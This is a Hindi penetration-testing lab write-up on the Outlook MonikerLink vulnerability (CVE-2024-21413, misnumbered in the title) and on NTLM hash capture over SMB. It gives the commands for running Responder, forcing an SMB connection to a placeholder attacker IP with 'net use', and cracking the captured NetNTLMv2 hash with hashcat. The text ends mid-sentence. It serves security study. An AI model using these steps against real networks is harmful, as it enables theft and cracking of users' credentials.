
CVE 2024-214113 (MONIKER LINK) Vuln के PenTest के लिए बनाया गया प्रयोगशाला।
इस परियोजना का उद्देश्य CVE-2024-21413 (MonikerLink) भेद्यता का अध्ययन करना था, यह पता लगाना कि कैसे SMB/NTLM प्रोटोकॉल का दुरुपयोग क्रेडेंशियल्स कैप्चर करने के लिए किया जा सकता है।
माइक्रोसॉफ्ट के आधिकारिक पैच के बाद भी, प्रयोगशाला दर्शाती है कि यह अवधारणा आंतरिक परिदृश्यों में मान्य बनी हुई है।
भेद्यता (CVE-2024-21413), जिसे MonikerLink के नाम से जाना जाता है, को गंभीर (CVSS 9.8) के रूप में वर्गीकृत किया गया था। यह इसलिए होती है क्योंकि Outlook "file://" लिंक को असुरक्षित रूप से संसाधित करता था, पुराने COM API (Moniker Objects) का उपयोग करके। ये ऑब्जेक्ट Outlook को संरक्षित दृश्य (Protected View) से गुज़रे बिना बाहरी संसाधनों को कॉल करने की अनुमति देते थे, जिससे क्लाइंट स्वचालित रूप से SMB कनेक्शन शुरू करने के लिए प्रेरित होता था।
यह विंडोज़ की एक सुविधा है जो विशेष लिंक के माध्यम से COM ऑब्जेक्ट्स को संदर्भित करने की अनुमति देती है।
मूल एक्सप्लॉइट ने ईमेल द्वारा भेजे गए "file://" या UNC पथों का दुरुपयोग किया।
लिंक में "!" वर्ण जोड़कर, Outlook की आंतरिक सुरक्षाओं को दरकिनार करना संभव था, जिससे बाहरी संसाधन को सीधे खोलने के लिए मजबूर किया जाता था।
इसके परिणामस्वरूप स्वचालित NTLM प्रमाणीकरण होता था, जो उपयोगकर्ता की महत्वपूर्ण बातचीत के बिना हमलावर को NetNTLMv2 हैश उजागर करता था।
पैच KB5002519 विशेष रूप से Outlook में इस व्यवहार को अवरुद्ध करता है, जिससे "file://" लिंक को इस तरह से संसाधित होने से रोका जाता है।
हालांकि, विंडोज़ का स्वचालित NTLM Outlook के संदर्भ के बाहर कार्य करना जारी रखता है, अर्थात, किसी भी SMB संसाधन तक पहुँचने का प्रयास, जहाँ NTLM सक्षम है और प्रमाणीकरण प्रतिबंध नहीं हैं, फिर भी हैश का स्वचालित प्रेषण उत्पन्न कर सकता है।
📌 Outlook, SMB/NTLM और Responder के बीच संबंध मूल एक्सप्लॉइट: दुर्भावनापूर्ण लिंक वाले ईमेल स्पैम के माध्यम से → Outlook प्रक्रिया → NTLM स्वचालित रूप से प्रमाणित → हमलावर को हैश प्राप्त।
आंतरिक प्रयोगशाला: हम केवल अवधारणात्मक भाग का अनुकरण करते हैं → हम मैन्युअल रूप से SMB कनेक्शन को मजबूर करते हैं → Responder हैश कैप्चर करता है → Hashcat क्रैक करता है।
यह अभी भी क्यों काम करता है? क्योंकि NTLM एक विरासत प्रोटोकॉल है जो Outlook से स्वतंत्र रूप से SMB कनेक्शन पर स्वचालित रूप से प्रमाणित करता है। पैच Outlook क्लाइंट को ठीक करता है, लेकिन विंडोज़ में NTLM के व्यवहार को समाप्त नहीं करता


परीक्षण के दौरान, Outlook ने ईमेल से आने वाले file:// लिंक को अवरुद्ध कर दिया, सुरक्षा चेतावनी प्रदर्शित करते हुए:

फरवरी 2024 में जारी पैच KB5002519, file:// लिंक को अवरुद्ध करके ईमेल के माध्यम से बाहरी वेक्टर को कम करता है।
हालांकि, NTLM प्रोटोकॉल अभी भी SMB कनेक्शन पर स्वचालित प्रमाणीकरण की अनुमति देता है।
इसका मतलब है कि, हालाँकि Outlook इस विशिष्ट एक्सप्लॉइट से सुरक्षित है, आंतरिक हमले की सतह मान्य बनी हुई है।
मूल मुद्दा प्रमाणीकरण तंत्र के रूप में NTLM पर निर्भरता में निहित है, जो SMB कनेक्शन पर हैश कैप्चर के लिए संवेदनशील बना हुआ है।
sudo responder -I eth0

एक्सप्लोरर के माध्यम से, मैन्युअल रूप से पहुँचते हुए:
\\<हमलावर का IP>\test.

टर्मिनल (cmd या PowerShell) के माध्यम से, कमांड का उपयोग करके:
net use \\<हमलावर का IP>\test

/usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt
नोट:
सुरक्षा कारणों से वास्तविक पासवर्ड प्रदर्शित नहीं किया गया है। उद्देश्य प्रक्रिया और भेद्यता को प्रदर्शित करना है।

इस प्रयोगशाला ने स्पष्ट किया कि: